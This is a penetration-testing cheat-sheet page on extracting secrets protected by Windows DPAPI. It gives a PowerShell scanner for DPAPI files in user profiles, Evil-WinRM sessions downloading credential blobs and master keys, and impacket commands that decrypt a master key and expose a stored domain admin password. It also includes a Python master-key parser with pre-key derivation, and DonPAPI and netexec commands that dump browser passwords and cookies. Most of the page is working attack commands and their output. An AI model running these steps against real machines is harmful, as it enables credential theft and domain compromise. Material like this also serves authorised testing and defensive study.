# DPAPI

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

The Data Protection Application Programming Interface or [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection) is a set of Windows APIs (`CryptProtectData` / `CryptUnprotectData`) used to encrypt and decrypt data blobs for Windows features and many third-party applications. User-scope blobs are encrypted under a per-user master key that is itself protected with a key derived from the user's password, so the password, its NT hash, or the domain DPAPI backup key unlocks it; system-scope blobs use machine master keys whose protection keys live in the `DPAPI_SYSTEM` LSA secret. Here are just a few examples of applications that use DPAPI and what they use it for:

| Applications                | Use of DPAPI                                                                                |
| --------------------------- | ------------------------------------------------------------------------------------------- |
| `Internet Explorer`         | Password form auto-completion data (username and password for saved sites).                 |
| `Google Chrome`             | Password form auto-completion data (username and password for saved sites).                 |
| `Outlook`                   | Passwords for email accounts.                                                               |
| `Remote Desktop Connection` | Saved credentials for connections to remote machines.                                       |
| `Credential Manager`        | Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more. |

## DPAPI Discovery

{% embed url="https://xtromera.github.io/arsenal/dpapiAuto/" %}

```powershell
# Function to check if a directory exists and handle access errors silently
function Check-Directory {
    param ([string]$Path)
    try {
        # Test-Path also sees hidden/system directories; access errors are swallowed
        return [bool](Test-Path -Path $Path -PathType Container -ErrorAction SilentlyContinue)
    } catch {
        return $false
    }
}

# Function to scan for DPAPI-related paths
function Scan-DPAPI {
    $basePath = "C:\Users"

    # Check if base path exists
    if (!(Test-Path $basePath -ErrorAction SilentlyContinue)) {
        Write-Error "Base path $basePath does not exist!"
        return
    }

    # Get all user directories
    $userDirs = Get-ChildItem -Path $basePath -Directory -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName

    # List of DPAPI-related paths to check for each user profile
    $pathsToCheck = @(
        "AppData\Roaming\Microsoft\Protect",           # User master keys: one <SID> folder holding GUID-named key files and 'Preferred'
        "AppData\Roaming\Microsoft\Credentials",       # Credential Manager blobs (roaming part of the profile)
        "AppData\Local\Microsoft\Credentials",         # Credential Manager blobs (local part of the profile)
        "AppData\Roaming\Microsoft\Vault",             # Credential Vault
        "AppData\Local\Microsoft\Edge\User Data",      # Microsoft Edge data
        "AppData\Local\Google\Chrome\User Data",       # Google Chrome data
        "AppData\Roaming\Microsoft\Internet Explorer"  # Internet Explorer data
    )

    # Scan each user directory
    foreach ($userDir in $userDirs) {
        Write-Host "Scanning user directory: $userDir" -ForegroundColor Cyan

        # A profile we cannot enter at all (another user's, without admin rights)
        if (!(Check-Directory -Path $userDir)) {
            Write-Warning "No permissions on directory of user: $userDir"
            continue
        }

        foreach ($subPath in $pathsToCheck) {
            $fullPath = Join-Path -Path $userDir -ChildPath $subPath
            if (Check-Directory -Path $fullPath) {
                Write-Host "Found DPAPI-related path: $fullPath" -ForegroundColor Green
            }
        }
    }

    # Check system-wide DPAPI paths
    $systemPaths = @(
        "C:\Windows\System32\Microsoft\Protect" # SYSTEM master keys (S-1-5-18 and S-1-5-18\User); reading them needs admin rights
    )
    Write-Host "Scanning system-wide paths..." -ForegroundColor Yellow
    foreach ($sysPath in $systemPaths) {
        if (Check-Directory -Path $sysPath) {
            Write-Host "Found DPAPI-related path: $sysPath" -ForegroundColor Green
        } else {
            Write-Warning "No permissions or path not accessible: $sysPath"
        }
    }
}

# Run the DPAPI scan
Scan-DPAPI
```

```
.\ScanDPAPI.ps1
Scanning user directory: C:\Users\Administrator
Scanning user directory: C:\Users\C.Neri
Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect
Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Credentials
Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Vault
Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Edge\User Data
Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Internet Explorer
Scanning user directory: C:\Users\c.neri_adm
Scanning user directory: C:\Users\Public
Scanning system-wide paths...
Found DPAPI-related path: C:\Windows\System32\Microsoft\Protect
```

## Impacket

```
*Evil-WinRM* PS C:\Users\username\Documents> cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials
*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Credentials> dir -h


    Directory: C:\Users\username\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          6/7/2024   5:08 PM            430 C4BB96844A5C9DD45D5B6A9859252BA6


*Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> download C4BB96844A5C9DD45D5B6A9859252BA6
```

```
*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect> dir


    Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-          6/7/2024   1:17 PM                S-1-5-21-4024337825-2033394866-2055507597-1115
```

```
*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> dir -h
 
 
    Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         12/4/2024   2:46 AM            740 1fe00192-86ec-4689-a4f2-f8c2336edaf4
-a-hs-          6/7/2024   1:17 PM            740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-a-hs-          6/7/2024   1:17 PM            740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
-a-hs-         12/4/2024   2:46 AM             24 Preferred
 
*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
```

With the user's password known (if not, see [Bruteforce masterkey](#bruteforce-masterkey)), decrypt the master key. `-sid` is the name of the folder under `Protect` that holds the key files. The same subcommand accepts `-key` with an already-derived key instead of `-password`, and with Domain Admin rights the domain backup key exported by `impacket-dpapi backupkeys` can be passed with `-pvk` to decrypt any domain user's master key without knowing the password.

```
$ impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password password
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
```

```
$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=admin_acc
Description : 
Unknown     : 
Username    : domain\username_adm
Unknown     : P4ssW0rd0312
```
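The two files downloaded above (`Preferred` and the GUID-named master key file) have simple fixed layouts, and the "User Key (MD4 protected)" line in the impacket output is the result of a short derivation. The following is an added example, not code from this page, from impacket or from MasterKeyBrute: a stdlib-only Python parser for both files plus the user pre-key derivation (HMAC-SHA1 keyed with the password hash over the NUL-terminated UTF-16LE SID, which is what the public tools implement). The GUID, SID and section lengths in the constructed sample bytes mirror the listing and output above; the key material itself is zero-filled and not a real master key. Brute forcing a master key (next section) is this pre-key derivation repeated per candidate password, followed by the PBKDF2 and AES/HMAC verification step that impacket performs and which is left to the tools here.

```python
"""Parse DPAPI master key artefacts and derive the user pre-key (stdlib only).

Added example; the sample bytes at the bottom are constructed, not captured.
"""
import hashlib
import hmac
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Fixed 128-byte header at the start of every master key file:
#   Version, two unused DWORDs, GUID as 36 UTF-16LE chars (72 bytes), one unused
#   DWORD, the two DWORDs impacket prints as Flags and Policy, then four QWORD
#   lengths of the variable sections that follow the header.
MK_HEADER = struct.Struct("<LLL72sLLLQQQQ")
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_preferred(data: bytes) -> dict:
    """`Preferred` is 24 bytes: GUID of the master key currently in use
    (mixed-endian, as Windows stores GUIDs) followed by a FILETIME expiry."""
    if len(data) != 24:
        raise ValueError(f"Preferred should be 24 bytes, got {len(data)}")
    guid = uuid.UUID(bytes_le=data[:16])
    (expiry,) = struct.unpack("<Q", data[16:])
    return {"guid": str(guid), "expires": filetime_to_datetime(expiry)}


def parse_masterkey_file(data: bytes) -> dict:
    """Split a master key file into its header fields and variable sections."""
    if len(data) < MK_HEADER.size:
        raise ValueError("file shorter than the 128-byte master key header")
    (version, _, _, guid_raw, _, flags, policy,
     mk_len, bk_len, ch_len, dk_len) = MK_HEADER.unpack_from(data)
    offset = MK_HEADER.size
    sections = {}
    for name, length in (("masterkey", mk_len), ("backupkey", bk_len),
                         ("credhist", ch_len), ("domainkey", dk_len)):
        sections[name] = data[offset:offset + length]
        offset += length
    if offset != len(data):
        raise ValueError(f"sections end at {offset}, file is {len(data)} bytes")
    return {
        "version": version,
        "guid": guid_raw.decode("utf-16le"),
        "flags": flags,
        "policy": policy,
        "sections": sections,
    }


def user_prekey(pwdhash: bytes, sid: str) -> bytes:
    """Pre-key that unlocks a user's master key.

    pwdhash is either the NT hash (MD4 of the UTF-16LE password, the case
    impacket labels "MD4 protected") or SHA1 of the UTF-16LE password.
    """
    return hmac.new(pwdhash, (sid + "\0").encode("utf-16le"), hashlib.sha1).digest()


# Constructed sample input mirroring the listing above (key bytes are zeros).
SID = "S-1-5-21-4024337825-2033394866-2055507597-1115"
GUID = "99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"
SAMPLE_MK_FILE = (MK_HEADER.pack(2, 0, 0, GUID.encode("utf-16le"), 0, 0, 0,
                                 136, 104, 0, 372)
                  + bytes(136 + 104 + 372))          # 128 + 612 = 740 bytes
SAMPLE_PREFERRED = uuid.UUID(GUID).bytes_le + struct.pack("<Q", 133_000_000_000_000_000)

if __name__ == "__main__":
    pref = parse_preferred(SAMPLE_PREFERRED)
    print(f"Preferred -> {pref['guid']} (expires {pref['expires']:%Y-%m-%d})")
    mk = parse_masterkey_file(SAMPLE_MK_FILE)
    print(f"Version {mk['version']}, GUID {mk['guid']}, "
          f"MasterKeyLen {len(mk['sections']['masterkey'])}, "
          f"DomainKeyLen {len(mk['sections']['domainkey'])}")
    sha1_hash = hashlib.sha1("password".encode("utf-16le")).digest()
    print("SHA1 pre-key:", user_prekey(sha1_hash, SID).hex())
```

`parse_preferred` tells you which GUID file to download when a profile holds several master keys; the section lengths returned by `parse_masterkey_file` are the values impacket prints, and a non-zero `domainkey` section is what makes the `-pvk` backup-key route possible for domain users. MD4 is deliberately not computed here because OpenSSL builds without legacy algorithms make `hashlib.new("md4")` fail; pass in the NT hash from a dump instead.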

## Bruteforce masterkey

{% embed url="https://github.com/ProcessusT/MasterKeyBrute" %}

## Tools

{% hint style="info" %}
*These tools require local admin privileges on the target, or Domain Admin privileges to use the domain backup key*
{% endhint %}

### dploot

{% embed url="https://github.com/zblurx/dploot?s=03" %}
dploot
{% endembed %}

### Donpapi

`exegol-CPTS /workspace # DonPAPI "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"`

### Netexec - CME

{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}

```
# Dump DPAPI-protected secrets (Credential Manager, vaults, browser passwords) from the target
nxc smb <ip> -u user -p password --dpapi

# Also collect browser cookies
nxc smb <ip> -u user -p password --dpapi cookies

# Collect only user secrets, skipping the SYSTEM-scope (machine) DPAPI secrets
nxc smb <ip> -u user -p password --dpapi nosystem
```

{% embed url="https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-dpapi" %}

### dpapidump.py

{% embed url="https://www.synacktiv.com/publications/lsa-secrets-revisiting-secretsdump" %}

{% embed url="https://github.com/fortra/impacket/pull/1898/commits/e8f437200248b641b3baa3ce48505232287150e3#diff-7b05ddc04bf27afd35a49ab42419b2aa8f56c01f70d3517fc6de04317be05714" %}
